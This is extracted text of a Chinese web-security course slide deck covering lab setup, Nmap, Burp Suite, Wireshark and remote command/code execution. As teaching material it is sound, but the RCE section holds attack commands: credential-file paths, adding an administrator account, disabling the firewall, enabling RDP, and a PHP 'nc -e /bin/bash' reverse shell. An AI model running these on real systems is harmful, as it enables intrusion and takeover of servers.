




版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)
文檔簡介
《Web應(yīng)用安全與防護》項目1:Web應(yīng)用安全基礎(chǔ)項目2:Web安全實踐環(huán)境部署項目3:常用Web應(yīng)用安全工具項目4:RCE漏洞利用與防護項目5:文件包含漏洞利用與防護項目6:文件上傳漏洞利用與防護項目7:文件下載漏洞利用與防護項目8:SQL注入漏洞利用與防護項目9:XSS漏洞利用與防護項目10:滲透測試綜合實訓(xùn)全套可編輯PPT課件
本課件是可編輯的正常PPT課件項目1:Web應(yīng)用安全基礎(chǔ)
本課件是可編輯的正常PPT課件項目目標(biāo)知識目標(biāo)1.了解web安全起源2.理解web體系結(jié)構(gòu)3.掌握Web應(yīng)用安全分析能力目標(biāo)1.能對瀏覽器安全設(shè)置2.能對服務(wù)器安全配置情感目標(biāo)1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團隊合作精神本課件是可編輯的正常PPT課件目錄03Web應(yīng)用安全01Web安全起源02Web系統(tǒng)架構(gòu)&owasptop10目錄本課件是可編輯的正常PPT課件1.Web安全起源文件傳輸郵件服務(wù)打印機服務(wù)Windows系統(tǒng)RPC服務(wù)Linux系統(tǒng)ssh服務(wù)1.Web技術(shù)發(fā)展不成熟2.攻擊系統(tǒng)服務(wù)可以獲取高權(quán)限網(wǎng)絡(luò)安全初期本課件是可編輯的正常PPT課件1.Web安全起源靜態(tài)頁面CGI調(diào)用其他程序Web編程腳本語言框架橫飛前段發(fā)展異步請求前端框架本課件是可編輯的正常PPT課件1.Web安全起源數(shù)據(jù)關(guān)乎于企業(yè)的信譽和個人安全獲取重要的敏感數(shù)據(jù)攻擊用戶的瀏覽器面向安全意識薄弱的用戶Web安全的兩個里程碑本課件是可編輯的正常PPT課件目錄03Web應(yīng)用安全01Web安全起源02Web系統(tǒng)架構(gòu)&owasptop10目錄本課件是可編輯的正常PPT課件2.1Web系統(tǒng)架構(gòu)
B/S(即Broswer/Server)解決了C/S(Client/Server)所帶來的不便,在C/S結(jié)構(gòu)的情況下,不同的服務(wù)需要安裝不同的客戶端軟件,比如QQ、迅雷、Foxmail這種情況下安裝的軟件會越來越多.B/S架構(gòu)將所有的服務(wù)都可以通過瀏覽器來完成(因為基本所有瀏覽器都安裝了瀏覽器)。但B/S也有一些不利,比如操作穩(wěn)定性、流暢度等方面相對較弱。本課件是可編輯的正常PPT課件2.1Web系統(tǒng)架構(gòu)瀏覽器三大瀏覽器:Firefox、IE,chrome服務(wù)器Apache,iis,nginx數(shù)據(jù)庫Mysql,SqlServer,Oracle等RequestResponseSQLResulthttp協(xié)議Sql命令支撐服務(wù)軟件應(yīng)用軟件:tomcat,jboss等本課件是可編輯的正常PPT課件2.2OWASPTOP10Owasp:開源web應(yīng)用安全項目,是一個國際權(quán)威的安全社區(qū)。官方網(wǎng)址:10項最嚴重的web應(yīng)用程序安全風(fēng)險,這些數(shù)據(jù)包含了數(shù)以百計的組織和超過10萬個應(yīng)用程序和api中收集的漏洞,結(jié)合了可用性,可檢測性和影響程度評估而成。本課件是可編輯的正常PPT課件目錄03Web應(yīng)用安全01Web安全起源02Web系統(tǒng)架構(gòu)&owasptop10目錄本課件是可編輯的正常PPT課件4.Web應(yīng)用安全Web應(yīng)用安全體現(xiàn):(1)Web協(xié)議安全(Http)(2)WEB服務(wù)器端安全問題(支撐軟件、應(yīng)用程序)(3)Web客戶端(瀏覽器)本課件是可編輯的正常PPT課件4.Web應(yīng)用安全—http協(xié)議1.HTTP協(xié)議概述(1)http(超文本傳輸協(xié)議),1990年提出來了,當(dāng)前的版本是http1.1(2)http是一個請求和回應(yīng)協(xié)議:客戶端提出請求,服務(wù)器對請求給出回應(yīng)。(3)http使用的是使用TCP協(xié)議進行連接,端口號是80(4)http請求方法(get,post,head,put,delete,option,trace)Get,明文傳輸,傳輸?shù)臄?shù)據(jù)顯示在地址欄,最大傳輸為2kb,Post,密文傳輸,傳輸?shù)臄?shù)據(jù)沒有限制。本課件是可編輯的正常PPT課件4.Web應(yīng)用安全—http協(xié)議2.http協(xié)議安全問題(1)信息泄漏(傳輸數(shù)據(jù)明文)(2)弱驗證(會話雙方?jīng)]有嚴格認證機制)http1.1提供摘要訪問認證機制,采用MD5將用戶名、密碼、請求包頭等進行封裝,但仍然不提供對實體信息的保護,無法有效解決信息泄露、數(shù)據(jù)篡改、重放攻擊等安全問題(3)缺乏狀態(tài)跟蹤(請求響應(yīng)機制決定http是一個無狀態(tài)協(xié)議)Cookie+Session解決方案帶來的安全問題本課件是可編輯的正常PPT課件4.Web應(yīng)用安全—http協(xié)議3.HTTP工作機制-請求響應(yīng)模式3.1HTTP請求包含三個部分1.開始行:方法/URL協(xié)議/版本2.首部行:請求頭部3.實體主體:請求正文(一般不用)3.2HTTP響應(yīng)包含三個部分1.協(xié)議狀態(tài)代碼描述2.響應(yīng)包頭3.實體包請求正文…..本課件是可編輯的正常PPT課件4.Web應(yīng)用安全—http協(xié)議4.http請求數(shù)據(jù)結(jié)構(gòu)(1)user_agent(簡稱UA)(2)X-Forwarded-For(主要是為了讓web服務(wù)器獲取訪問用戶的真實IP地址,未必真實,可以偽造)(3)Referer(表示從哪兒鏈接到服務(wù)器的網(wǎng)頁)(4)Content-Type(定義網(wǎng)絡(luò)文件的類型和網(wǎng)頁的編碼,用來程序間傳送內(nèi)容相關(guān)的編碼信息)(5)Accept(代表發(fā)送端希望接收的數(shù)據(jù)類型)(6)Accept-Charset(編碼)(7)Accept-Encoding(瀏覽器支持的壓縮編碼)(8)host(表示請求的服務(wù)器網(wǎng)址)(9)keep-Alive表示持久鏈接本課件是可編輯的正常PPT課件4.Web應(yīng)用安全—http協(xié)議5.http狀態(tài)碼分類當(dāng)瀏覽器訪問一個網(wǎng)頁時,瀏覽器會向服務(wù)器發(fā)送請求,在瀏覽器接收并顯示網(wǎng)頁前,此頁面所在的服務(wù)器會返回一個包含http狀態(tài)碼的信息頭,用以響應(yīng)瀏覽器的請求。HTTP狀態(tài)碼分類分類分類描述1**信息,服務(wù)器收到請求,需要請求者繼續(xù)執(zhí)行操作2**成功,操作被成功接收并處理3**重定向,需要進一步的操作以完成請求4**客戶端錯誤,請求包含語法錯誤或無法完成請求5**服務(wù)器錯誤,服務(wù)器在處理請求的過程中發(fā)生了錯誤本課件是可編輯的正常PPT課件4.Web應(yīng)用安全—服務(wù)器安全服務(wù)支撐軟件安全問題軟件自身安全漏洞例:IIS5.0超長URL拒絕服務(wù)漏洞軟件配置缺陷默認賬號、口令不安全的配置例:IIS配置允許遠程寫入應(yīng)用軟件安全問題本課件是可編輯的正常PPT課件4.Web應(yīng)用安全—Apache安全配置ApacheHTTPServer(Apache),阿帕奇安全配置只安裝所需要的組件隱藏Apahce版本不用root運行Apache禁用目錄瀏覽設(shè)置每個連接的最大請求數(shù)建立專門錯誤頁面勤打補丁本課件是可編輯的正常PPT課件4.Web應(yīng)用安全—IIS安全設(shè)置配置身份驗證配置地址和域名訪問規(guī)則配置SSL安全配置URL授權(quán)規(guī)則主目錄及目錄安全性(目錄權(quán)限)日志安全文檔和錯誤消息本課件是可編輯的正常PPT課件4.Web應(yīng)用安全—IE安全配置清除瀏覽器數(shù)據(jù)本課件是可編輯的正常PPT課件小結(jié)1.
web安全起源2.web體系結(jié)構(gòu)3.Web應(yīng)用安全分析本課件是可編輯的正常PPT課件作業(yè)1.安裝IIS服務(wù)器,并做安全配置2.設(shè)置安全瀏覽器本課件是可編輯的正常PPT課件項目2:Web安全實踐環(huán)境部署
本課件是可編輯的正常PPT課件項目目標(biāo)知識目標(biāo):1.了解web常見名詞及術(shù)語的含義2.掌握kaillinux安裝與msf框架的更新3.掌握web漏洞環(huán)境部署(linux、win)能力目標(biāo):1.能部署linux及window
web漏洞環(huán)境情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團隊合作精神本課件是可編輯的正常PPT課件目錄03搭建winweb漏洞環(huán)境01web專業(yè)術(shù)語02搭建linuxweb漏洞環(huán)境目錄本課件是可編輯的正常PPT課件1.專業(yè)術(shù)語常見專業(yè)名詞CVEEXPpayloadPOCshellcodewebshellRCESQLXSSCSRF0day1dayndaywaf蜜罐提權(quán)CNNVDNVD本課件是可編輯的正常PPT課件1.專業(yè)術(shù)語1.CVE(CommonVulnerabilities&Exposures)全球漏洞編號2.exp(exploit)能夠?qū)β┒垂舻拇a。(漏洞利用)3.poc:證明漏洞存在的代碼4.payload:攻擊荷載,它是最終發(fā)送到服務(wù)器執(zhí)行的代碼5.Shellcode:用于利用軟件漏洞執(zhí)行代碼,屬于payload,是攻擊代碼最核心的就是shellcode6.webshell:web后門7.RCE:遠程代碼執(zhí)行漏洞
本課件是可編輯的正常PPT課件1.專業(yè)術(shù)語8.0day:零日漏洞。即剛被發(fā)現(xiàn)后立即被惡意利用的安全漏洞,一般來說,那些已經(jīng)被小部分人發(fā)現(xiàn),但是還未公開、還不存在安全補丁的漏洞。9.1day:已經(jīng)公開的新鮮漏洞(大部分機器未打補?。?0.Nday:公開很久的漏洞11.提權(quán):提升到管理員權(quán)限12.NVD:國家漏洞數(shù)據(jù)庫13.CNNVD:中國國家漏洞數(shù)據(jù)庫本課件是可編輯的正常PPT課件1.專業(yè)術(shù)語14.WAF(WebApplicationFirewall)Web應(yīng)用防火墻15.蜜罐:在主機上布置一些漏洞,誘惑攻擊者進入,從而可以對攻擊行為進行捕獲和分析,了解攻擊方所使用的工具與方法,推測攻擊意圖和動機,能夠讓防御方清晰地了解他們所面對的安全威脅。16.SQL:SQL注入漏洞17.XSS:跨站腳本攻擊漏洞18.CSRF:跨站請求偽造漏洞本課件是可編輯的正常PPT課件目錄03搭建winweb漏洞環(huán)境01web專業(yè)術(shù)語02搭建linuxweb漏洞環(huán)境目錄本課件是可編輯的正常PPT課件2.Web漏洞環(huán)境搭建—Linux搭建web2.centos7Linux+Apache+MySQL+PHP(LAMP)Step1:配置yum源Step2:安裝apacheStpe3:安裝mysqlStep4:安裝phpStep5:測試本課件是可編輯的正常PPT課件3.Web漏洞環(huán)境搭建—Linux搭建webMetasploitable2
虛擬系統(tǒng)是一個特別制作的ubuntu操作系統(tǒng),本身設(shè)計作為安全工具測試和演示常見漏洞攻擊。metasploitable2下載地址/projects/metasploitable/files/Metasploitable2/本課件是可編輯的正常PPT課件目錄03搭建winweb漏洞環(huán)境01web專業(yè)術(shù)語02搭建linuxweb漏洞環(huán)境目錄本課件是可編輯的正常PPT課件3.Web漏洞環(huán)境搭建—win搭建web3win搭建web環(huán)境Step1:下載phpstudy
/Step2:安裝phpstudyStep3:部署dvwa漏洞環(huán)境step4:修改dvwa配置文件Step5:測試
本課件是可編輯的正常PPT課件web攻擊環(huán)境kailLinux系統(tǒng)安裝/downloads/2.更新msf3.幾個網(wǎng)站///本課件是可編輯的正常PPT課件小結(jié)1.web常見名詞及術(shù)語的含義2.kaillinux安裝、msf框架的更新3.web漏洞環(huán)境部署本課件是可編輯的正常PPT課件作業(yè)1.部署windowweb漏洞環(huán)境2.部署linuxweb漏洞環(huán)境3.更新msf本課件是可編輯的正常PPT課件項目3:常用Web應(yīng)用安全工具
本課件是可編輯的正常PPT課件項目目標(biāo)【知識目標(biāo)】(1)了解一句話木馬工作原理。(2)掌握Nmap端口掃描技術(shù)。(3)掌握BurpSuite的抓包、改包和暴力破解等核心功能。(4)掌握Wireshark的數(shù)據(jù)包捕獲、過濾和深度分析方法?!炯寄苣繕?biāo)】(1)能夠運用Nmap進行有效的端口掃描,識別目標(biāo)系統(tǒng)的開放端口和服務(wù)。(2)能夠使用BurpSuite進行網(wǎng)絡(luò)數(shù)據(jù)的抓取、修改、重放及進行基本的暴力破解攻擊。(3)能夠利用Wireshark進行網(wǎng)絡(luò)流量分析,識別異常數(shù)據(jù)包和潛在的安全威脅。(4)能夠使用Webshell管理工具進行服務(wù)器管理,包括文件操作、命令執(zhí)行等?!舅刭|(zhì)目標(biāo)】(1)培養(yǎng)網(wǎng)絡(luò)安全意識。(2)培養(yǎng)創(chuàng)新思維能力。(3)激發(fā)自主學(xué)習(xí)熱情。本課件是可編輯的正常PPT課件1.信息收集概述1.1信息收集定義收集目標(biāo)的情報信息是一個非常重要的環(huán)節(jié),可以大大提高滲透測試的成功性。收集滲透目標(biāo)情報一般是對目標(biāo)系統(tǒng)的分析,掃描探測,服務(wù)查點,查找對方系統(tǒng)IP等,社會工程學(xué)在滲透測試中也有經(jīng)常使用。滲透測試會盡力收集目標(biāo)系統(tǒng)的配置,whois,主機IP段,公司人員,安全防御以及防火墻等信息。1.信息收集2.漏洞挖掘3.漏洞利用4.權(quán)限提升5.內(nèi)網(wǎng)滲透6.痕跡清除滲透測試流程本課件是可編輯的正常PPT課件1.信息收集概述著名的照片泄密案背景大慶油田在發(fā)現(xiàn)之初,其位置、儲量、產(chǎn)量等信息全部定為國家機密1964年《中國畫報》封面泄露信息衣著判斷->北緯46度至48度的區(qū)域(即齊齊哈爾與哈爾濱之間)所握手柄的架式->油井的直徑鉆井與背后油田的距離和井架密度->儲量和產(chǎn)量本課件是可編輯的正常PPT課件1.信息收集概述微博時代的范例:影星的住址背景:明星家庭住址是明星隱私,她們都不愿意透露,微博時代,明星也愛玩微博微博信息13:50:四環(huán)堵死了,我聯(lián)排要遲到了?在北京工作這么久,都沒在北京中心地帶買一套房子光顧著看圍脖,忘記給老爸指路,都開到中關(guān)村了結(jié)論:北四環(huán)外某個成熟小區(qū),小區(qū)中間有三個相連的方形花壇Googleearth能幫助我們快速找到這個小區(qū)本課件是可編輯的正常PPT課件1.信息收集概述時間:2013年6月人物:愛德華.斯諾登將棱鏡門項目的秘密文檔披露給了英國《衛(wèi)報》和美國《華盛頓郵報》大數(shù)據(jù)的價值:
(1)信息收集是情報分析的基礎(chǔ)(2)依托數(shù)據(jù)分析獲取重要信息本課件是可編輯的正常PPT課件1.信息收集概述1.2信息收集目的(1)黑客在攻擊之前需要收集信息,才能實時有效的攻擊。(2)安全管理員用信息收集技術(shù)來發(fā)現(xiàn)系統(tǒng)的弱點,并進行修補本課件是可編輯的正常PPT課件1.信息收集概述1.3信息收集分類(1)被動信息收集
:網(wǎng)站與服務(wù)信息:whois、DNS
搜索引擎:baidu,google
社會工程學(xué)……(2)主動信息收集本課件是可編輯的正常PPT課件1.信息收集概述1.3信息收集分類(2)主動信息收集
:主機掃描端口掃描
服務(wù)掃描
操作系統(tǒng)掃描……本課件是可編輯的正常PPT課件2.信息收集之DNS信息收集2.1DNS信息收集方式(1)命令行查詢:nslookup,dig(2)在線查詢:/dns//
(3)工具查詢:dnsenum本課件是可編輯的正常PPT課件2.信息收集之DNS信息收集2.2DNS信息收集演示:nslookup-type=nsnslookup–type=ptr
或者輸入nslookup命令進入shell交互settype=ns/ptr輸入域名或者ip本課件是可編輯的正常PPT課件3.信息收集之社會工程學(xué)凱文·米特尼克世界著名黑客3次入獄記者采訪:你最擅長的技術(shù)是什么?回答:社會工程學(xué),技術(shù)會過時,只有社會工程學(xué)永遠不會凱文米特尼克所著《欺騙的藝術(shù)》本課件是可編輯的正常PPT課件3.信息收集之社會工程學(xué)人是永遠的系統(tǒng)弱點!什么是社會工程學(xué)攻擊利用人性弱點(本能反應(yīng)、貪婪、易于信任等)進行欺騙獲取利益的攻擊方法社會工程學(xué)的危險永遠有效的攻擊方法人是最不可控的因素本課件是可編輯的正常PPT課件3.信息收集之社會工程學(xué)3.1公開信息:通過社交網(wǎng)站進行公開信息收集,比如QQ,QQ空間,微信朋友圈,微博等,能獲取到的信息有姓名、年齡、生日、星座、愛好、照片、人際交往關(guān)系,甚至郵箱、手機、住址、身份證等等隱私、敏感信息。還有一些招聘求職網(wǎng)站也往往是信息泄露最嚴重的地方。3.2社工庫:是運用社會工程學(xué)進行攻擊的時候積累的各方面的數(shù)據(jù)結(jié)構(gòu)化數(shù)據(jù)庫。這個數(shù)據(jù)庫里有大量信息,甚至可以找到每個人的各種行為記錄,比如酒店開房記錄,個人身份證、姓名和電話號碼。本課件是可編輯的正常PPT課件4.信息收集之端口掃描4.1端口掃描簡介端口掃描工具:nmap,被稱為掃描器之王。通過端口掃描確定主機開放的端口,不同的端口對應(yīng)運行著不同的服務(wù)。基本功能如下:(1)探測一組主機是否在線(2)掃描主機端口,嗅探所提供的網(wǎng)絡(luò)服務(wù)(3)推斷主機所用的操作系統(tǒng)本課件是可編輯的正常PPT課件4.信息收集之端口掃描4.2Nmap掃描方式(1)全掃描(2)半掃描(3)隱蔽掃描(4)漏洞掃描……本課件是可編輯的正常PPT課件4.信息收集之端口掃描4.3nmap常用參數(shù)(1)-sT:tcp連接掃描
例:nmap–sT(2)-sS:tcpsyn掃描例:nmap-sS(3)-sU:udp掃描例:nmap-sU–p1-65535(4)-p:掃描指定端口(5)-F:快速掃描主機格式:192.168.1.*192.168.1-255.1-254/24本課件是可編輯的正常PPT課件4.信息收集之端口掃描4.3nmap常用參數(shù)(5)-O:顯示操作系統(tǒng)例:nmap–O(6)-sV:顯示Banner信息例:nmap–sV(7)-v:輸出更詳細的信息例:nmap–svV(8)-oX:導(dǎo)出掃描結(jié)果到xml文件中例:nmap–oXresult.xml本課件是可編輯的正常PPT課件4.信息收集之端口掃描4.3nmap
常用參數(shù)(9)-oG:導(dǎo)出掃描結(jié)果到txt文件中
nmap-sV–p22,80-oG1.txt(10)-Pn:不進行ping掃描(11)-iL:從一個文件中掃描主機列表
namp–-iLip.txt(12)-exclude:掃描地址段排除某段地址
namp/24–exclude00本課件是可編輯的正常PPT課件4.信息收集之端口掃描規(guī)避防火墻:用一組虛擬的地址掩蓋自己真實的IP地址,從而規(guī)避被發(fā)現(xiàn)掃描過程,可以達到一個規(guī)避防火墻的功能。例如:nmap–v–F–Pn–D05,06,ME–eeth0–g3355-Pn:不進行ping掃描-D:使用虛擬IP地址掩蓋真實IPME:真實IP-e
eth0從該網(wǎng)卡發(fā)送數(shù)據(jù)包-g3355表是自己使用某個端口
靶機地址本課件是可編輯的正常PPT課件5.BurpSuite工具
BurpSuite
是用于攻擊web應(yīng)用程序的集成平臺。常用的功能:抓包、重放、爆破Burpsutie工具安裝使用1.在win環(huán)境下,需要首先安裝java環(huán)境2.下載地址:/burp/communitydownload
3.在kailinux環(huán)境下,輸入burpsuite啟動該工具本課件是可編輯的正常PPT課件5.BurpSuite工具
Proxy是一個攔截http/https的代理服務(wù)器,作為一個在瀏覽器和目標(biāo)應(yīng)用程序之間的中間人,允許你攔截、查看、修改在兩個方向上的原始數(shù)據(jù)。本課件是可編輯的正常PPT課件5.BurpSuite工具
在使用brupsutie抓包之前,需要對burpsuite進行配置和瀏覽器進行配置Burpsuite配置瀏覽器配置本課件是可編輯的正常PPT課件5.BurpSuite工具
1.Burpsuite代理服務(wù)設(shè)置2.Burpspide探測web結(jié)構(gòu)3.暴力攻擊web口令本課件是可編輯的正常PPT課件6.Wireshark
1.Wireshark簡介Wireshark是一款強大的網(wǎng)絡(luò)分析工具,該工具主要用來用來捕獲網(wǎng)絡(luò)數(shù)據(jù)包,并自動解析數(shù)據(jù)包,為用戶顯示數(shù)據(jù)包的詳細信息,供用戶對數(shù)據(jù)包進行分析。它支持Windows、Linux、MacOSX等多種操作系統(tǒng),KaliLinux操作系統(tǒng)已經(jīng)自行安裝好了該軟件。打開已經(jīng)安裝好的Wireshark,本課件是可編輯的正常PPT課件6.Wireshark顯示過濾器:捕獲數(shù)據(jù)后,設(shè)置過濾條件,顯示過濾器通過特定的表達式來篩選出滿足條件的數(shù)據(jù)包,使得分析工作更加高效和便捷。菜單欄下方的輸入框就是輸入顯示過濾條件的地方本課件是可編輯的正常PPT課件6.Wireshark(3)常用顯示過濾器表達式①IP地址過濾ip.addr==#顯示所有源或目標(biāo)IP為
的數(shù)據(jù)包。ip.src==或ip.dst==#分別過濾源IP或目標(biāo)IP。②端口過濾tcp.port==80#顯示所有TCP端口為80的數(shù)據(jù)包(通常用于HTTP流量)。udp.port==53#顯示所有UDP端口為53的數(shù)據(jù)包(通常用于DNS查詢)。本課件是可編輯的正常PPT課件6.Wireshark③協(xié)議過濾http#顯示所有http數(shù)據(jù)包。tcp#顯示所有TCP數(shù)據(jù)包。icmp#顯示所有ICMP數(shù)據(jù)包。ip||arp#顯示IP和ARP數(shù)據(jù)包。tcp||udp||icmp#顯示TCP、UDP和ICMP數(shù)據(jù)包。④多條件組合ip.addr==&&tcp.port==80#同時過濾IP地址和端口。本課件是可編輯的正常PPT課件6.Wireshark⑤使用邏輯運算符!(ip.addr==)#排除所有IP地址為的數(shù)據(jù)包。⑥數(shù)據(jù)內(nèi)容過濾data[0:2]==00:00#檢查數(shù)據(jù)包的前兩個字節(jié)是否為00:00。frame[0:3]=="GET"#檢查數(shù)據(jù)包的開始三個字節(jié)是否為"GET"(HTTPGET請求)。⑦HTTP請求方法過濾http.request.method=="GET"
#僅顯示HTTPGET請求。http.request.method=="POST"#僅顯示HTTPPOST請求。本課件是可編輯的正常PPT課件6.Wireshark⑧域名過濾http.host==""#僅顯示訪問特定域名的主機流量。⑨URL過濾http.request.uri=="/index.html"#僅顯示請求特定URI的數(shù)據(jù)包。⑩數(shù)據(jù)包長度過濾frame.len==1500#顯示數(shù)據(jù)包大小恰好為1500字節(jié)的數(shù)據(jù)包。frame.len>1000&&frame.len<1500#顯示大小在1000到1500字節(jié)之間的數(shù)據(jù)包。本課件是可編輯的正常PPT課件6.Wireshark?特定數(shù)據(jù)包內(nèi)容過濾datacontains"username"#顯示包含"username"字符串的數(shù)據(jù)包。data[0:4]contains"login"#顯示前四個字節(jié)中包含"login"字符串的數(shù)據(jù)包。?TCP狀態(tài)過濾tcp.flags==0x18#僅顯示TCP數(shù)據(jù)包,其中標(biāo)志為PSH和ACK。tcp.flags&RST==1#僅顯示TCPRST(重置)數(shù)據(jù)包。本課件是可編輯的正常PPT課件中國菜刀
Webshell管理工具是一種專門用于管理和控制已經(jīng)成功植入目標(biāo)服務(wù)器的Webshell的客戶端工具,它提供了用戶友好的界面來執(zhí)行系統(tǒng)命令、文件管理、數(shù)據(jù)庫操作等。常見的Webshell管理工具有中國菜刀(Chopper)、中國蟻劍(AntSword)、冰蝎(Behinder)等。本書以典型的Webshell管理工具中國菜刀為例講解。本課件是可編輯的正常PPT課件項目4:RCE漏洞利用與防護
本課件是可編輯的正常PPT課件項目目標(biāo)知識目標(biāo):1.了解RCE漏洞的定義、分類2.掌握遠程系統(tǒng)命令執(zhí)行漏洞利用與加固3.掌握遠程代碼執(zhí)行漏洞利用與加固能力目標(biāo):1.具有利用RCE漏洞獲取系統(tǒng)權(quán)限的能力情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團隊合作精神本課件是可編輯的正常PPT課件1.RCE漏洞概要1.1RCE漏洞定義RCE(remotecommand/codeexecute),RCE漏洞可以讓攻擊者直接向后臺服務(wù)器遠程注入操作系統(tǒng)命令或者代碼,從而控制后臺系統(tǒng)。本課件是可編輯的正常PPT課件1.RCE漏洞危害1.2RCE漏洞的危害RCE漏洞的危害跟web中間件運行的權(quán)限有關(guān)。由于web應(yīng)用運行在web中間件上,所以web應(yīng)用會“繼承”web中間件的運行權(quán)限。如果存在RCE漏洞的web應(yīng)用運行在以系統(tǒng)管理員身份運行的web中間件上,那么黑客就相當(dāng)于擁有一個管理員權(quán)限的shell,如果中間件權(quán)限分配過大,黑客就可以控制web服務(wù)器。黑客可以利用漏洞任意的執(zhí)行權(quán)限允許的命令,比如,查看系統(tǒng)敏感信息,添加管理員,反彈shell,下載并運行惡意代碼等。本課件是可編輯的正常PPT課件1.RCE漏洞危害1.3敏感信息--Windows敏感信息
C:\boot.ini//查看系統(tǒng)版本
C:\Windows\System32\inetsrv\MetaBase.xml//IIS配置文件
C:\Windows\repair\sam//存儲系統(tǒng)初次安裝的密碼
C:\ProgramFiles\mysql\my.ini//Mysql配置
C:\ProgramFiles\mysql\data\mysql\user.MYD//MysqlrootC:\Windows\php.ini//php配置信息
C:\Windows\my.ini//Mysql配置信息本課件是可編輯的正常PPT課件1.RCE漏洞危害1.3敏感信息--Linux敏感信息:/root/.ssh/id_rsa/root/.ssh/id_ras.keystore/root/.ssh/known_hosts//記錄每個訪問計算機用戶的公鑰/etc/passwd、/etc/shadow/etc/f//mysql配置文件/etc/httpd/conf/httpd.conf//apache配置文件/root/.bash_history//用戶歷史命令記錄文件/root/.mysql_history//mysql歷史命令記錄文件本課件是可編輯的正常PPT課件1.RCE漏洞概要1.4RCE漏洞分類:
(1)遠程系統(tǒng)命令執(zhí)行漏洞(2)遠程代碼執(zhí)行漏洞本課件是可編輯的正常PPT課件2.遠程系統(tǒng)命令執(zhí)行漏洞2.1遠程系統(tǒng)命令執(zhí)行漏洞
一般出現(xiàn)這種漏洞,是因為應(yīng)用系統(tǒng)從設(shè)計上需要給用戶提供指定的遠程命令操作的接口,比如我們常見的路由器、防火墻、入侵檢測等設(shè)備的web管理界面上一般會給用戶提供一個ping操作的web界面,用戶從web界面輸入目標(biāo)IP,提交后,后臺會對該IP地址進行一次ping測試,并返回測試結(jié)果。但是設(shè)計者在完成該功能時,沒有做嚴格的安全控制,則可能會導(dǎo)致攻擊者通過該接口提交“意想不到”的命令,從而讓后臺進行執(zhí)行,從而控制整個后臺服務(wù)器。本課件是可編輯的正常PPT課件2.遠程系統(tǒng)命令執(zhí)行漏洞2.2命令執(zhí)行漏洞原理命令執(zhí)行漏洞的本質(zhì)是由于系統(tǒng)把用戶輸入進來的參數(shù)當(dāng)成了要執(zhí)行的命令,并且這些命令被執(zhí)行了,這樣就造成了命令注執(zhí)行漏洞。命令執(zhí)行漏洞產(chǎn)生的原因有兩點(1)web網(wǎng)站沒有對用戶提交的參數(shù)進行有效的檢測過濾(2)操作系統(tǒng)允許一條語句執(zhí)行多條命令(使用連接符和管道符)本課件是可編輯的正常PPT課件2.遠程系統(tǒng)命令執(zhí)行漏洞2.3常見連接符序號常見命令連接符說明1A;B先執(zhí)行A,再執(zhí)行B2A&B簡單拼接,AB之間無制約關(guān)系3A|B顯示B的執(zhí)行結(jié)果4A&&BA執(zhí)行成功,然后才會執(zhí)行B5A||BA執(zhí)行失敗,然后才會執(zhí)行B其他連接符>>>.將結(jié)果重定向文件中(源文件內(nèi)容會刪除)>>結(jié)果追加到文件末尾,源文件內(nèi)容不會被刪除。|管道,將命令的結(jié)果輸出給另一個命令作為輸入用本課件是可編輯的正常PPT課件2.遠程系統(tǒng)命令執(zhí)行漏洞netuser||whoaminetuser&&whoaminetuser:查看當(dāng)前系統(tǒng)有哪些用戶whoami:查看當(dāng)前系統(tǒng)登錄的用戶本課件是可編輯的正常PPT課件2.遠程系統(tǒng)命令執(zhí)行漏洞2.4常見的系統(tǒng)命令--window序號命令功能1ping測試網(wǎng)絡(luò)連通性2netstat查看網(wǎng)絡(luò)開放端口及連接狀態(tài)3netuser查看,增加,刪除當(dāng)前系統(tǒng)賬號4netlocalgroup查看,增加,刪除當(dāng)前系統(tǒng)用戶組5dir查看當(dāng)前目錄下的文件和子目錄信息6systeminfo查看當(dāng)前計算機的綜合信息7tasklist查看當(dāng)前運行的進程信息本課件是可編輯的正常PPT課件2.遠程系統(tǒng)命令執(zhí)行漏洞2.4常見的系統(tǒng)命令--linux序號命令功能1ifconfig查看ip地址2netstat查看網(wǎng)絡(luò)開放端口及連接狀態(tài)3whoami查看當(dāng)前用戶4cat/etc/passwd查看所有用戶的信息5useradd添加用戶6userdel刪除用戶7passwd修改密碼本課件是可編輯的正常PPT課件2.遠程系統(tǒng)命令執(zhí)行漏洞2.5源代碼分析本課件是可編輯的正常PPT課件2.遠程系統(tǒng)命令執(zhí)行漏洞2.6遠程系統(tǒng)命令執(zhí)行漏洞利用Window中,添加管理員賬號:netusertest123456/add#添加用戶testnetlocalgroupadministratorstest/add#把用戶test加入管理員組關(guān)閉防火墻:netshadvfirewallsetpublicprofilestateoff開3389端口(win7)REGADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server/vfDenyTSConnections/tREG_DWORD/d0/f本課件是可編輯的正常PPT課件3.遠程代碼執(zhí)行漏洞3.1遠程代碼執(zhí)行漏洞同樣的道理,因為需求設(shè)計,后臺有時候也會把用戶的輸入作為代碼的一部分進行執(zhí)行,也就造成了遠程代碼執(zhí)行漏洞。3.2與命令執(zhí)行漏洞區(qū)別:命令執(zhí)行漏洞是直接調(diào)用操作系統(tǒng)命令代碼執(zhí)行漏洞則是依靠執(zhí)行腳本代碼調(diào)用操作系統(tǒng)命令本課件是可編輯的正常PPT課件3.遠程代碼執(zhí)行漏洞3.3PHP執(zhí)行系統(tǒng)命令的函數(shù)(1)system()用法:system(string$command,[,int&$return_var])(2)exec()用法:exec(string$command[,array&$output[,int&$return_var]])(3)shell_exec()
用法:shell_exec(string&command)本課件是可編輯的正常PPT課件3.遠程代碼執(zhí)行漏洞3.3PHP執(zhí)行系統(tǒng)命令的函數(shù)(4)passthru()用法:passthru(string$command[,int&$return_var])(5)eval用法:eval(string$code)注:eval函數(shù)和前面四個函數(shù)的區(qū)別是不僅可以執(zhí)行系統(tǒng)命令,還可以將code參數(shù)直接當(dāng)作php代碼執(zhí)行。本課件是可編輯的正常PPT課件3.遠程代碼執(zhí)行漏洞3.4遠程代碼執(zhí)行漏洞利用1<?phpsystem('uname-a');?>2<?phpsystem(‘nc–e/bin/bash007777’)?>
